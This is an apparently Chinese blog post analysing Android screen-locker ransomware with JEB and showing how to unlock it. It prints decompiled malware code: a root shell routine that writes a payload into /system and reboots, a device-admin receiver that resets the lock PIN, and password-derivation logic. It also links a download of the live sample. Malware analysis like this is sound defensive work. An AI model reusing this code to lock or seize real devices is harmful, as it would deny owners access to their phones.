Android学习第七天---记录一次锁机软件的破解

本文通过实战分析了一款恶意软件的工作原理和技术细节。该软件通过获取超级管理员权限,修改系统文件并设置固定的锁屏密码,展示了从安装过程到系统重启后的具体步骤。

自己学习别人的帖子实战一下试试吧 以后也能装逼 反正这两天心情不好不是很想学习

原贴

首先安装一下 app

提示需要超级管理员权限 一看就不是好东西 给呗

然后手机就从新启动了

然后就出现了 这个zz的界面 不停的播放音乐

这里写图片描述

上面标记的两个地方一个事输入的一个是按钮(二维码)基本上很多app都是这个套路 如果找不到可以到Android studio里面看一下框架就知道了

现在分析一下这个软件 拖到jeb里面

<activity android:label="@string/app_name" android:name=".c">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

去到dex里面找 c (smile)我看不懂 邮件 Decompile查看java代码

看看OnCreate方法,这个方法就是在窗口被打开的时候调用的:

 @Override protected void onCreate(Bundle arg10) {
        c v0 = this;
        LogCatBroadcaster.start(v0);
        super.onCreate(arg10);
        v0.setContentView(2130903040);
        v0.b = v0.findViewById(2131099651);
        v0.t = v0.findViewById(0);
        v0.b.setOnClickListener(new ButtonClickListener(v0));
        c v4 = v0;
        try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }
        catch(IOException v4_1) {
        }
    }

主要看这两句

v0.b.setOnClickListener(new ButtonClickListener(v0));

v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());

第一句是给那个”点击打开悬浮窗”的按钮设置按钮事件 对应的是onClick方法 看一下

 @Override public void onClick(View arg8) {
            new b().rootShell();
            a.deleteFile(c.this.file);
        }

可以看到 我是60分java乱说 b新建了一个函数rootshell 我们到b.smile中看看去(大致可以才想到是获取root权限的)

void rootShell() {
        b.execCommand(new String[]{"mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot"}, true);
    }

可以看到大概就是把/sdcard/zihao.l这个文件当成一个APK安装到系统分区里,最后reboot就是重启,当然,他在期间申请了所需要的权限;

这个zihao.l是如何来的 回到c.smile里面 可以看到

 private void d(String arg13) throws IOException {
        FileOutputStream v3 = new FileOutputStream(arg13);
        InputStream v2 = this.getAssets().open("ijm-x86.so");
        byte[] v4 = new byte[1024];
        int v5;
        for(v5 = v2.read(v4); v5 > 0; v5 = v2.read(v4)) {
            v3.write(v4, 0, v5);
        }

        v3.flush();
        v2.close();
        v3.close();
    }

再看看这个 onCreate里面的

try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }

这几句就是无限循环的读,读到没得读为止,边读边写,读谁?读自身存储路劲下的ijm-x86.so,然后写出到arg13这个路径,就是在前面传进来的那个路径:
v0.path在构造器中已经声明了是取SD卡根路径;
到这,第一层就结束了,手机开始重启,重启之后就会听到一首十分动听的歌曲

那我们来到第二层 将ijm-x86.so改为 ijm-x86.apk拖进jeb里面分析一下

还是先看MainFast.xml

<activity android:label="@string/app_name" android:name=".M">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

” android:name=”.M” 嗯..先看看m.smile

 private void activiteDevice() {
        Class v8;
        M v0 = this;
        Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
        ComponentName v5 = null;
        ComponentName v6 = null;
        M v7 = v0;
        try {
            v8 = Class.forName("com.h.MyAdmin");
        }
        catch(ClassNotFoundException v5_1) {
            throw new NoClassDefFoundError(v5_1.getMessage());
        }

        super(((Context)v7), v8);
        v1.putExtra("android.app.extra.DEVICE_ADMIN", ((Parcelable)v5));
        v0.startActivityForResult(v1, 0);
    }

    @Override public void onCreate(Bundle arg6) {
        LogCatBroadcaster.start(this);
        super.onCreate(arg6);
        this.activiteDevice();
    }

意思就是启动MyAdmin这个receiver 我们进入MyAdmin看看

 @Override public CharSequence onDisableRequested(Context arg10, Intent arg11) {
        String v4 = Integer.toString(1997);
        this.getManager(arg10).lockNow();
        this.getManager(arg10).resetPassword(v4, 0);
        return super.onDisableRequested(arg10, arg11);
    }

主要就是把锁屏的 pin 码设置为 1997,然后又启动了 s 这个服务,那来看看这个 s 把;
好乱啊.. 全部无视直接看 onCreate 和 onStart


    @Override public void onCreate() {
        s v0 = this;
        super.onCreate();
        v0.pass = ((long)(Math.random() * (((double)155))));
        v0.passw = new Long((v0.pass + (((long)7176))) * (((long)7)));
        v0.des = new DU("flower");
        s v3 = v0;
        try {
            v3.des = new DU(v0.des.decrypt("c29fe56fa59ab0db"));
        }
        catch(Exception v3_1) {
        }

        v0.share = v0.getSharedPreferences("Flowers", 0);
        v0.editor = v0.share.edit();
        if(v0.share.getLong("m", ((long)0)) == (((long)0))) {
            v0.editor.putLong("m", v0.pass);
            v0.editor.commit();
            v3 = v0;
            try {
                v3.editor.putString("passw", v0.des.encrypt(new StringBuffer().append("").append(v0.passw).toString()));
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }

            if(v0.is(v0.getApplicationContext())) {
                v0.ppss = new StringBuffer().append(v0.share.getLong("m", ((long)8))).append("").toString();
                v3 = v0;
                s v4 = v0;
                try {
                    v3.password = v4.des.decrypt(v0.share.getString("passw", ""));
                }
                catch(Exception v3_1) {
                }

                new 100000000(v0).start();
                return;
            }

            v3 = v0;
            try {
                v3.editor.putLong("m", Long.parseLong(v0.des.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9")));
                v0.editor.commit();
                v0.editor.putString("passw", "5a15e58cc8db8d1c700ecb6bb7b627a9");
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }
        }
    }

这里一看就是加解密的 请教大土豆师傅 师傅叫我smali插桩 这个是要学习学习 肯定有用 开始跑题 算了 就先这样把这个分析完吧 下一篇学习smali插桩

这里可一看到是用 c29fe56fa59ab0db解出来的值作为密钥

然后再解密

秘钥就是 “ (序列号++7176)*7 ”

恶意软件下载地址

样品:链接: http://pan.baidu.com/s/1kVdav8F 密码: 8wtz

成功解锁

删除的方法 adb 连接 进去删除 有些可以直接这样删除 就不用那么麻烦了

评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值